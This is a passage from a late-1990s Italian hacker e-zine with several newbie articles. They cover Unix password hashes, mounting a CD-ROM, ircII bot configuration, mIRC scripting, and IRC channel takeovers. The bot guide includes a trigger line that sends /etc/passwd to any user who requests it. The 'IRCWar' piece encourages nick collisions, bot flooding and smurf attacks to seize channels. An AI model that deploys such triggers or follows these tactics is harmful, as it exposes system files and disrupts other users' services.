che si vantava d avere centinaia di mega di vocabolari e poi si bloccava su
password solo xche' erano tutte o in parte maiuscole...
X i piu' esperti cio' che ho da dire e' poco xche' effettivamente so poco
cmq unix conserva il proprio db di pass nel file /etc/shadow e nelle versioni
dove non c'e' l'aggiornamento col pacchetto shadow nel file /etc/passwd.
Il db di pass ovviamnte non tine ele password "in chiaro" se no che gusto ci
sarebbe a trovrsele li' belle pronte ;) Ovviamente non sono neanche crittate
quindi che contengono? Ebbene contengono hash monodirezionale delle password
degli user e del/dei superuser.
Per decriptarle poi una funzione hash monodirezionale elabora l'input e lo
converte in un unico valore. Tanto x capirci quando l'utente tenta di
eseguire il login, lo *nix applica alla password immessa dall'user la stessa
funzione hash gia' prima eseguita per immettere la password nel db e poi
fa un controllo sul nuovo valore generato e lo confronta con il valore hash
contenuto nel db delle pass, dopodiche' se i due valori corrispondono,
l'ser puo' entrare nella sua shell. Le + comuni funzioni hash usate negli so
*nix sono il DES hash e MD5.

p.s: ovviamente non sono stato a spiegare i vari campi del passwd dato che ci
sono decine di testi che spiegano tale cosa e, ho saputo, la stessa cosa e'
stata spiegata ben bene anche su questa ezine.

Bye Bye al prossimo articolo sempre e solo qui su Newbies X-ReWoP

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ COME MONTARE IL CDROM IN LINUX ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Ciao :)) eccomi di nuovo qui x spiegarvi come montare il cdrom... NOOOOOOO
che avete capito, non vi sto mica a spiegare dove dovete collegare il
connettore i cavetti ide i jumper... io non ne capisco un cazz di arduer
:D
Questo vi servira' solo x poter leggere un vostro CD in ambiente linux...
perche' come sapete [seeee come no :D] il linux non e' come il windoze che
c'ha mscdex e voi inzaccate un cd e quello ve lo fa partire con
l'autorun... il linux e' piu' PROFESCIONAL, ve lo dovete montare voi ogni
volta hihihihi :D
Bah dopo questa piccola introduzione, passiamo all'utilizzo del comando
mount, che e' quello che ci servira' x montare il nostro cd. Create una
dir in qualunque posto, come ad esempio sotto /mnt/cdrom, e poi eseguite
il seguente comando:

mount -t iso9660 /dev/cdrom /mnt/cdrom

dove /mnt/cdrom e' la dir scelta da voi x montare il cd.
A questo punto, x vedere i filez contenuti nel compact dirigetevi nella
dir dove lo avete montato e sfogliatevi tutte le cartelle, semplice no?
:D
Oki, una volta finito a vedere il contenuto del nostro bel cd porno
masterizzato [il massimo del warez :D], per espellere il cd dal vostro
lettore NON basta premere il pulsantino di apertura dell'attrezzo :) - la
prima volta che ci ho provato vidi che non mi si apriva, io non capivo il
perche' di sto fatto, poi alla fine decisi che era dovuto a un calo di
alimentazione del lettore cd e mi misi l'anima in pace... quando scoprii
quello che NON avevo fatto mi resi conto della mia SUPERBA intelligenza
:D - dicevo, per cacciare il benedetto cdrom dobbiamo digitare il seguente
comanduccio da console:

umount /dev/cdrom /mnt/cdrom

a questo punto magikamente sara' tornata l'alimentazione al cdrom e voi
potrete espellerlo con calma x inserire quello di Incarta 99 x fare vedere
alla vostra mammina che non guardate i pornazzi ma che studiate ;D a voi
la scelta :D
Cya al prox articolo... Ciauz !!! :D

St0rM BriNgeR

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°°°°°°°°°°°°°°°°°°°°°°°°°ÛÛ°°°ÛÛÛÛÛÛÛÛ°°°ÛÛÛÛÛÛÛÛ°°°°°°°°°°°°°°°°°°°°°°°°°°°²
²°°°°°°°°°°°°°°°°°°°°°°°°°ÛÛ°°°ÛÛ°°°°ÛÛ°°°ÛÛ°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°²
²°°°°°°°°°°°°°°°°°°°°°°°°°ÛÛ°°°ÛÛÛÛÛÛÛÛ°°°ÛÛ°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°²
²°°°°°°°°°°°°°°°°°°°°°°°°°ÛÛ°°°ÛÛ°ÛÛÛ°°°°°ÛÛ°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°²
²°°°°°°°°°°°°°°°°°°°°°°°°°ÛÛ°°°ÛÛ°°ÛÛÛÛ°°°ÛÛÛÛÛÛÛÛ°°°°°°°°°°°°°°°°°°°°°°°°°°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

******************************************************************************
********PANKRAZIO [guida x i bot [for really newbies but good to read]********
******************************************************************************

Come scrivere il file di configurazione di un bot.
di pankrazio

PREMESSA[1]:
Lo so che testi simili si possono trovare nella rete, ma per favore, non
venite ad insultarmi dicendo che ho rippato i vostri articoli/siti/testi...
Il fatto che siano reperibili in altri posti le stesse informazioni non
significa che io abbia copiato tutto, no? :)

PREMESSA[2]:
Visto che ormai il celeberrimo pIGpEN viene imitato anche dagli esseri
unicellulari e dalle lumache, non mi discostero' dalla massa e faro' questa
benedetta introduzione demente come si deve ;)

Articolo: Come scrivere il file di config di un bot
Cibo consumato: Dei waferini tipo Loacker ma con una crema piu' abbondante e
gustosa, una lattina di Coca cola
Musica ascoltata: Le vecchie sigle dei cartoni animati (che ci volete fare,
quando sento "Though Boy" mi concentro come in nessun'altra
occasione!) :)

Bien, direi che si puo' partire.
Come probabilmente molti di voi sapranno, i bot sono dei programmi che si
usano per gestire un canale (di solito, ma possono anche servire per
takeoverarlo - ma non divaghiamo) in modo da dare gli op automatici alle
persone registrate, Tenere sempre aperto il canale, (scongiurando il rischio
di trovare un paio di op che non si conosce soli sul chan quando si joina),
e altre cose sfiziose di questo tipo.
Per fare un bot avete bisogno di tre cose fondamentali:
Una shell
Il file di config
Un programma per IRC (oppure lo potete fare con gli eggdrop, ftp.eggdrop.net).

Allora, per la shell non e' obiettivo di questo articolo spiegarvi come
trovarne una, bensi' spiegarvi come scrivere il file di config. Ecco i
comandi principali:

/nick [nickdelbot]

Questo serve a dare il soprannome ad un bot... es /nick Lamadonna

/serv [nomeserver]

Indica al bot che server deve joinare

/set realname [real_name]

Questo non e' indispensabile, serve per aggiungere il real name al vostro bot.

/comment [commento]

Per rendere piu' ordinato il testo del config, vi conviene usare questo per
capire che stavate facendo mentre scrivevate... :) es. /comment UAAAAAA!!
SONO PAZZOOOOHH!!!

Vi consiglio di settare il comando:
/set beep off

Bene bene, ora dovremmo farci oppare dal bot :) Cominciamo a fargli eseguire
il comando who so ogni persona
che joina il canale. Cosi':
/on join * /who $0

Perfetto... A questo punto dobbiamo dirgli in che condizioni deve oppare
qualcuno:
/on who "* * * pankrazio *orgasmo.org *" /mode $C +o $1

Mi oppera' nel caso la mia mask sara' pankrazio e il mio host orgasmo.org oppure
una parte.
Cosa intendo per una parte? ad esempio UARAAAAAGH.orgasmo.org :)
La stessa cosa e' fattibile coi kick e coi ban. Vediamo come:

/on join zcools /kick $C zcools

In questo modo ogni qual volta che il nostro amico Zero joinera' il mio chan,
verra' preso a calcioni dal mio fido animale da guardia... :)

Si puo' kickare qualcuno in base all'host cosi', invece:
/on who "* * * zcools *sono.stupido.com *" /kick $C $1

Bien, ora il nostro bot deve saper rientrare nel canale quando lo kickano e
sapersi riconnettere al server quando lo disconnettono. Tutto e' fattibile
con queste due linee:
/on raw_irc "* KICK * * Lamadonna*" /join #canale
e...
/on disconnect * /serv server

Bene, dopo tutto cio' siam pronti a far qualcosa di piu' complicato: far parlare
il bot, facendolo rispondere!
Ci sono in giro per IRC (su IRCnet non tanti, ce n'e' qualcuno su Undernet)
bot abbastanza complicati che rispondono decentemente alle domande
dell'utente... anche se il massimo in fatto di bot che rispondono
sia Eloisa (web.tin.it/eloisa). Questo non e' un bot.. e' solo una divagazione
=).

Sono due le condizioni da prendere in considerazione: /on public e /on msg
La prima serve a quando qualcosa viene detto sul canale, mentre la seconda
per le query.
Ad esempio, se volete un chan dove il bot inizia ad insultare chiunque quando
sente una parolaccia...
/on public "* fanculo* " / VACCI TE PEZZO DI MERDA DI UN $0 !
e avanti cosi', fino a fare una lista di 20-30 parolacce :)
/on msg "yo" /msg $0 ciao
Questa invece dice in query "ciao" a uno che gli ha detto "yo" :)


/on msg "vogliolapass" /exec -msg $0 cat /etc/passwd

Emh, non prendetela in considerazione... e' la mia mente malata :) In ogni
caso questo serve per mandare l'output di un comando (in questo caso cat
/etc/passwd) a chi ne fa richiesta :)

Bene, direi che abbiamo finito. Per avviarla con il buon vecchio ircii dovete
fare:

irc -l -b config.cfg

Per toglierlo dovete killare il processo (ps l per vedere il PID, poi kill
-HUP PID)
Tutto questo per un bot su shell Linux, a dire la verita' da win ce ne sono
ben pochi (a meno di usare l'egg)

Una volta un coglione mi fa: Eh eh eh, io adesso faccio un bot col mIRC, lo
metto nel negozio dei miei amici che hanno una T3 sempre collegata ad
Internet... eh eh eh
E io: non fai prima a fartelo da una shell Linux?
Lui: nopez
Io: una T3.. niente male... 45Mb/s
Lui: MA CHE CAZZO DICI???? una T3 va a 128kb/s!!!
Io: ...
Io:/ignore Lui

Per pieta' ho mascherato il nick di codesto idiota... :)

Ringraziamenti finali:
Innanzitutto a zerocool, per l'amicizia dimostratami in questi mesi.
Poi a Ljl, Le_chuck, CescoIENA, dbpass, Koog, SKAM, Acas, delsys, ^corvus^,
w00w00, Vecna, Dingo, Vulcan, Guybrush-, mR_bis0n, tutta la ghenga di #emuita,
#tgm, #cazzeggio, #hackernow e... basta.
Grazie per la cortese attenzione. Buon proseguimento di giornata.
pankrazio

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

===[ Per iL MONDO Di QUARZ avremo: ]===
==[ SkRiPT mIRC? NO POBBEM! 1^tempo ]==
==========[ by E N N A R O ]==========

001 *** INDICE GENERALE ***

001 INDICE GENERALE
002 PRECISAZIO VARIANZ
003 HEADERz
004 KE MI SERVE(R) PER AKKOMMINCIARE...
005 INTRODUZIA GENERALA
006 USO DELLE VARIABILI
007 USO DEGLI OPERATORI LOGICI
008 USO DEGLI IDENTIFIKATORI
009 USO DEI KOMANDI DI mIRC
010 NELLA PROXIMA PUNTATA
011 SALUTAGGi VARi

002 *** PRECISAZIO VARIANZ ***

'Giorno a todoz guagliu'...

Prima di iniziare a parlare degli skript per mirc e' bene ke io faccia
alkune precisazioni:

Kuesto art. non vuole essere una kontinuazione di kuello apparso
il num. skorso ke portava la firma di SpYmAsTeR, in ogni kaso mi
limitero' soltanto a riassumere le parti gia' trattate nell'art.
mIRC scripting tutorial k?. [se kuesto ha un senZo non lo so' pero'
kosi' stanno i fatti kuindi adattatevi:]

003 *** HEADERz: ***

-PREREKUiSiTi NECESSARi: 10x Neuroni, un po' di volonta', la kapacita'
di saper sfruttare la guida akklusa al mIRC.
-OBBiETTiVO FiNALE: Riuscire a kreare uno skript senza bisogno di
rippare troppo... ;)
-iNKRETiENTi NECESSARi: 1x client mIRC (doh!), 1x server IRC (spiego
dopo).

004 *** KE MI SERVE(R) PER AKKOMMINCIARE(iniziare) A SCRIPTARE ?? ***

L'attrezzatura del perfetto skripterz konsiste (oltre al klient) di un
proggy ke simuli + o - fedelmente sulla vostra makkina un server IRC kon
le karatteristike di una determinata rete (IRCnet EFnet DALnet ecc.)
Io ne ho provati due:

-WircSRV
-IRCPLUS

Li potrete trovare un po' dappertutto kon un po' di ricerke nei vari
siti ke rakkolgono shareware...
Io personalmente ho apprezzato di + IRCPLUS in kuanto + kompleto e
personalizzabile di WircSRV.

Avere un server vi permettera di kollegarvi in rete lokale kon esso e
testare kosi' il vostro skript.
Per konnettervi in rete lokale avete varie alternative:

-Digitate semplicemente [da mIRC] il komando /server 127.0.0.1 [usate la guida
in linea se volete sapere /server a kosa serve]

-Clikkate su GENERAL OPTIONS e poi sul pulsante Add, inserite una
deskrizione a kaso, in IRC Server ci mettete il vostro indirizzo lokale
127.0.0.1 la porta ke avete scelto (in genere la 6667) e klikkate su add,
kuindi su Connect to irc server avendo selezionato dalla lista dei server
disponibili kuello ke avete appena aggiunto.

-Kreate un popup ke abbia proprio kuesta funzione, se non sapete gia' farlo
imparerete nel korso del korso =)

005 *** INTRODUZIA GENERALA ***

Dunkuor kome gia' spiegato da SpYmAsTeR uno skript e' komposto da:
ALIAS, POPUPS, REMOTE + altre due sezioni USERS e VARIABLES in kui
andranno [in USERS] le "kategorie" assegnate dal proprio skript
ad altri utenti (vedi lista amici,autoop,shitlist ecc) e [in VARIABLES]
le variabili a kui ovviamente saranno assegnati dei valori ke lo skript
potra' utilizzare in seguito.

Diciamo subito ke la sezione REMOTE e' la piu' importante ed e' kuella
ke *DOVREBBE* essere sviluppata per prima dal momento ke le altre sezioni
in un certo senZo sono "konseguenze" dello sviluppo di kuesta.
Prima di passare allo sviluppo di kuesta sezione pero' dobbiamo
konoscere alkune kose:
-Uso delle variabili
-Uso degli operatori logici (If-elseif-else)
-Uso degli identifikatori (Identifiers)
-Uso dei komandi di mIRC (basta konoscere i principali gli altri
li konsultate tramite l'help)

006 *** USO DELLE VARIABILI ***

In breve kreare una variabile konsiste nell'assegnare un determinato
valore ad un determinato nome di variabile [ke kaxxo di definizione =]
Le variabili ke noi andremo a inserire all'interno dello skript saranno
tutte inkluse nella sezione VARIBLES kome accennato prima.

Vi sono vari komandi in mIRC per la manipolazione delle variabili e
sono tutti molto importanti se non essenziali:
[NB le varibili sono *sempre* precedute dal simbolo %]

/set %X Y
Krea una variabile di nome X e di valore Y.

/unset %X
Rimuove una variabile di nome X

/inc %X N
Akkresce il valore di %X di N unita'

/dec %X N
Diminuisce il valore di %X di N unita'

[NB vi sono altri komandi e varie opzioni per kuesti relativi alle
variabili {imparate a konzultare l'help :}]

Facciamo subito un esempio tanto per fermare nella mente kuesti komandi,
kreiamo un alias nell'apposita sezione di mIRC:

/profa01 {
/set %profa01 33
/echo (valore originario) %profa01
/inc %profa01 33
/echo (valore aumentato di 33) %profa01
/dec %profa01 66
/echo (valore diminuito di 66) %profa01
}

Okki kuesto alias e' talmente idiota ke evito di kommentarlo [sara' la
vekkiaia??] e se non sapete il komando echo ke vuol dire... o ve lo
cerkate o vi suicidate perke' non lo sapete... ;)

Va' detto ke kon le variabili si possono eseguire delle operazioni ad
esempio nell'alias di prima mettendo il valore 33 + 1 mi avrebbe restituito
34 al primo echo e kosi' via... Le operazioni possibili sono:

+ addizione /set %profa01 33 + 1
- sottrazione /set %profa01 33 - 1
* moltiplikazione /set %profa01 33 * 33
/ divisione /set %profa01 33 / 44
^ elevamento a potenza /set %profa01 33 ^ 33

E' possibile anke eseguire operazioni tra variabili:

/set %a 33
/set %b 44
/set %c %a * %b

Kiaro?? In ogni kaso sperimentate da soli il funzionamento delle variabili,
vi servira' a memorizzare i komandi e a impare a usarle...

007 *** USO DEGLI OPERATORI LOGICI ***

Vi vedo distratti ke sara'?? Vi e' venuta un'ulcera agli okki, vi sono
skaduti i 10 neuroni ke servivano? Se non volete rippare a vita dovete
impararle kueste kose... e kuelli di voi ke resteranno fino alla fine
senza saltare nessuna parte avranno il diploma di sKripter plakkato
in oro da NOBODY88 e l'esklusiva karta igienika kon la filigrana di NewBieS!

Dunkuor, gli operatori logici konfrontano determinati valori ed eseguono
dei komandi in funzione del risultato del konfronto effettuato.
La forma base di kuesto konfronto e' la seguente:

funzione logika (valore1 operatore valore2) { komandi da eseguire }

Le funzioni logike possono essere:IF[se] ELSEIF[se alrimenti] ELSE[altrimenti]
e se non kapite ke signika se o altrimenti, lasciate perdere non e' kolpa vostra
ve la dovete prendere kon vostra madre :[

I valori (valore1 e valore2) possone essere delle variabili o dei valori
fissi; gli operatori sono molti e sono la kiave di lettura dell'intera stringa
essi si okkupano di konfrontare kon determinati parametri i due valori, i piu'
importanti operatori sono:

== uguale a
!= diverso da
< minore di
> maggiore di
<= minore uguale di
>= maggiore uguale di
...

Ce se sono molti altri ke voi DI SIKURO andrete a vedere/imparare dall'help in
linea, in ogni kaso facciamo alkuni esempi per sckiarire le idee, prendiamo
kome base l'alias di prima:

/profa02 {
;i punti e virgola introdukono un kommento se non lo sapevate =)

/set %profa02 $$?="iNZERiSCi UN NUMERO A KAxxO:"
; $$?="..." e' un identifikatore ke kiede di inserire un valore
; kon una rikiesta specifikata da voi...

if (%profa02 < 50) { echo -s %profa02 e' un num. minore di 50 }
; se %profa02 e' minore di 50 allora ...

elseif (%profa02 == 50) { echo -s %profa02 e' il num. 50 }
; se invece %profa02 e' uguale a 50 allora...

else { echo -s %profa02 e' un num. maggiore di 50 }
; altrimenti ...
}

[NB l'opZione -s di echo obbliga il komando a visualizzare l'output
sulla finestra STATUS]

Tralasciando l'eccessiva idioZZZia dell'alias, esso vi mostra l'impiego degli
operatori logici principali, nel kaso in kui si vogliano kombinare le komparazioni
rendendone necessarie piu' di una, o almeno una di esse, si usano rispettivamente
gli operatori AND e OR; AND e' rappresentato da &&, OR da ||, in ogni kaso
per non riskiare di surriskaldare i vostri adorabili 10 neuroni di kui avete
bisogno, procediamo a un'altro esemplio:

/profa03 {
/set %profa03 $$?="iNZERiSCi UN NUMERO A KAxxO:"

if (%profa03 == 1717) || (%profa03 = 7171) { echo -s %profa03 e' 1717 oppure 7171 | halt }
; se %profa03 e' uguale a 1717 o a 7171 allora...

if (%profa03 > 50) { echo -s %profa03 e' un num. maggiore di 50 }
; kuesta la kapite da soli...

if (%profa03 < 20) { echo -s %profa03 e' un num. minore di 20 }
; kuesta pure...

if (%profa03 > 20) && (%profa03 < 50) { echo -s %profa03 e' kompreso tra 20 e 50 }
; se %profa03 e' maggiore di 20 e minore di 50 allora...

}

[NB halt serve per terminare l'esekuzione dell'alias ed e' stato messo in
kuanto 1717 e 7171 sono entrambi maggiori di 50 e avrebbero kuindi attivato
anke la sekonda stringa if... understand paisa'??]

008 *** USO DEGLI IDENTIFIKATORI ***

...mmm... ad ogni paragrafo siete sempre meno ... beh ke vi posso dire
rikordatevi della karta igienika per kuelli ke arriveranno alla fine!!!

Gli identifikatori(non so' se e' kuesto il termine italiano korretto
ne' mi interessa saperlo io li kiamo identifiers...) in sostanza rilasciano
il proprio valore ke hanno assunto in kuel determinato momento. Se un
identifikatore non puo' kalkolare il proprio valore rilascia il valore $null
un valore nullo appunto. Ekko un esempio elementare dell'uso di un
identifikatore:

/profa04 {
echo $duration($$?="iNZERiSCi UN NUMERO Di SECONDi DA KONVERTiRE:")
}

L'identifikatore $duration restituisce il numero di sekondi immesso nel formato
settimane/giorni/ore/minuti/secondi.

Vi sono diverse categorie di identifikatori per un numero komplessivo molto
alto, e non e' affato necessario impararli basta konsultare l'help kuando
serve e implementare nei propri script, in ogni kaso le kategorie piu'
importanti sono le seguenti [bella rimah]:

-Ident. di tempo e data
-Ident. di indirizzo e nick
-Ident. di testo e num.
-Ident. di finestra

Affinale non vi e' piu' nulla da kapire sul funzionamento degli
identifikatori e poi a tempo debito li analizzeremo uno per volta kuando
dovremo inserirli nella sezione remote, per ora potete dare uno sguardo
all'help e sfogliare la varie kategorie di ident. ma ripeto non serve a un
gran ke farlo...

009 *** USO DEI KOMANDI DI mIRC ***

Bene, benetton, vi lascio un kompito per kasa: aprite il vostro help del
mIRC e sfogliatevi la sezione *mIRC Commands* non e' necessario ke impariate
tutti i komandi, ma komunkue dateci uno sguardo, i komandi sono kome i
komponenti di un'auto, non ne potete kostruire una solo kon i karburatori
e le spazzole per i tergikristalli, kosi' per gli skript dentro non ci potete
mettere solo /echo /quit e /join dovrete metterci ben altro...

010 *** NELLA PROXIMA PUNTATA ***

Vedete di prokurarvi un server irc da installarvi perke' sara' essenziale.
Finalmente inizieremo a parlare di kome strutturare delle risposte agli eventi
e se ce la faccio vi spiego pure kome implementare alkune protezioni...

In kuest'art. avevo detto a Nobody88 ke vi avrei parlato gia' della
realizzazione di uno skript, e delle relative protezioni e automatismi, ma
skrivendo kuesto art., mi sono akkorto ke senza una base non sareste andati
molto lontano...

011 *** SALUTAGGi VARi ***

SALUTI ALLA MIA KREW:
-AnArChY per me sarai siempre l'anarkiko =))
-CrazyHorzo un'altro floddattero kome me...
-N0CE & Kaliforn & Kelvin KAxxO fateve senti'!!!
-agli altri un saluto generiko :P

SALUTI A GENZ VARIA:
-^S|{0rP|0 un 'ggiorno riusciremo ad ankontrarci =)))
-|guly- infinite tenkese per tu sai kosa ;)
-ghimlet se non mi avresti detto 4 mesi fa di prokurarmi
un portscanner non avrei mai studiato l'hack...
-micio2 azzo non ti riesko a bekkare piu' fatti senti' in email pliis =)
-SALUTO A _kuasi_ TUTTO #HACKERNOW [i bot mika li devo saluta'...]

byez genz byez
ENNARO ennaro@iname.com
Mekkanici Digitali Member

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ IRCWAR - FONDAMENTI ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Quando si parla di IRCWar ci si riferisce in genere a cose tipo takeover
di canali e cosi' via... per capire bene questi discorsi bisogna avere
una piccola base riguardo irc, i server irc, i netsplit e alcuni comandi
e modi di ircnet.

Diciamo che il terreno di battaglia principale dei takers e' lo split o il
desynch. I server irc splittano a causa del sovraccarico della rete. In
genere, prima e dopo lo split c'e' un periodo di desynch, cioe' di
desincronizzazione dei server. In questi periodi possono accadere strane
cose.. facciamo qualche esempio:
- Puo' accadere che un utente kicki un altro utente su un server, ma che su
un altro server risulti ancora che l'utente kickato stia dentro il canale.
Ovviamente l'utente che e' stato kickato legge ancora quello che gli altri
scrivono, a loro insaputa, ma lui non puo' comunque scrivere, in quanto
riceve il messaggio "Cannot send to channel".
- Se un canale e' opless (cioe' senza operatori) e avviene uno split tra
alcuni server, il taker si connette con un altro client sul server che e'
splittato e ottiene l'op sul canale, in quanto e' l'unico presente. Al
rejoin dei server, nessuno deoppera' il taker poiche' solo lui avra' l'op.
- Quando due server splittano, si puo' trovare il modo di killare le persone
a noi sgradite. Ad esempio, se il nostro "nemico" ha il nick Techno[K] (uno a
caso ;D) e il suo server splitta, noi potremo joinare il server che lui non
riesce a vedere e dovremo usare il suo nick. Al rejoin dei server, io e il
vero Techno[K] veniamo killati dai server per nick collision, in quanto irc non
consente due nick uguali. Se Techno[K] era op su un canale, ovviamente non lo
avra' piu' quando rijoinera' perche' disconnesso da irc.

Queste sono alcune delle tecniche principali per ottenere un canale. Ovviamente
se questo canale e' mantenuto da un certo numero di bot, la cosa sara' molto
piu' difficile. In questi casi, dobbiamo osservare bene il canale e capire come
i bot funzionano, a quali server sono connessi, e cosi' via, e dovremo prepararci
bene al take. Se si ha la possibilita' di smurfare e se si e' capaci, ve lo
consiglio vivamente :)
Per riuscire a fare take del canale si puo' operare in questo modo:
- Far collidere i nick, come spiegato in precedenza, ma questo puo' andar bene
solo se i bot sono pochi e se non sono configurati in modo che cambiano nick ogni
volta che c'e' uno split.
- Floodare o smurfare i bot, usando opportune tecniche... lo smurf e' sicuro, il
flood dei bot invece dipende soprattutto dalla botnet sotto esame. Se essa e'
configurata bene state certi che non cadranno mai i bot floodandoli con migliaia di
scritte o con join o con altre cose. Lo smurf e' sicuro, come dicevo, pero' e' piu'
difficile da realizzare. Occore una shell decente da cui smurfare, degli ottimi
broadcast e anche bravura quindi non e' per tutti... ;)
- Se notate che i bot oppano degli utenti appena essi entrano nel canale, cercate di
far cadere colui che e' stato oppato e fottetegli il nick e l'ident. Il bot in
qualche caso vi oppera'... e voi sarete padroni di tutto... ovviamente dovrete
essere veloci a deoppare e se vi portate alcuni amici e' anche meglio. E' inutile
dire che dovrete deoppare prima i bot e i cazzoni con gli script lamer, perche' sono
loro che potrebbero kickarvi per massdeop.

Alcuni altri consigli e raccomandazioni per l'ircwar:
- Dovete sempre preparare tutto prima di farlo... se dovete fare un mass deop
osservate bene la situazione, ed e' lo stesso anche per le altre operazioni.
- E' ovvio che possedere alcuni bot fa comodo, non devo dirvelo io :) usate anche
delle tcl buone se prevedete molti attacchi al vostro canale.
- Se riuscite a takare un canale, tenetelo chiuso per uno / due giorni... questo
tempo sara' necessario a far raffreddare le testoline dei padroni precedenti, e
servira' anche a configurare bene il canale con i relativi bot.

St0rM BriNgeR

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°°°°°°°°°ÛÛ°°ÛÛ°°°°°°ÛÛ°°°°°°°ÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°°ÛÛ°°ÛÛÛÛÛÛÛÛ°°°°°°°°°°²
²°°°°°°°°°ÛÛ°°ÛÛ°°°°°ÛÛÛÛ°°°°°ÛÛ°°°Û°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛÛ°°ÛÛ°°ÛÛ°°°°°°°°°°°°°°°°²
²°°°°°°°°°ÛÛÛÛÛÛ°°°°ÛÛ²²ÛÛ°°°ÛÛ°°°°°°°ÛÛÛÛ°°°°ÛÛ°°ÛÛÛÛ°ÛÛ°°ÛÛ°°ÛÛÛÛ°°°°°°°°°°²
²°°°°°°°°°ÛÛ°°ÛÛ°°°ÛÛÛÛÛÛÛÛ°°°ÛÛ°°°Û°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛ°ÛÛÛÛ°°ÛÛ°°°°ÛÛ°°°°°°°°°°²
²°°°°°°°°°ÛÛ°°ÛÛ°°ÛÛ°°°°°°ÛÛ°°°ÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛÛ°°ÛÛÛÛÛÛÛÛ°°°°°°°°°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

NOTA BY N0bodY88 = come al solito questa sezione oltre ad articoli di hacking
vero e proprio contiene gli art piu' disparati sempre
attinenti all'argomento hacking quindi che dire ...
... godeteveli :) ... e se vi sembra che un art dica cose
sbagliate o cmq poco giuste e volete dircelo allora
scrivete voi un art sull'argomento cosi' da aiutarci a
migliorare sia noi membri di NewBies sia i lettori che
magari sull'argomento non ne sanno molto e vanno in cerca
di qualcuno che gli spieghi qualcosa o meglio che lo
indirizzi verso la strada giusta...

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ IL MIO IP? BOH! ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

------------<[Il mio IP? BOH!]>----------------------------------------------

Autore: Mr_Skull

Consumo: 4 toast (faccio skifo), 7 pakketti di crackers (non di hackers),
5/6 preservativi (credete che noi newbies siamo sempre attaccati
al computer? Anche noi abbiamo altri piaceri, quindi, nei momenti
liberi fra una scrittura e l'altra mi diletto a lanciare gavettoni
a chi passa sotto il balcone... :)))

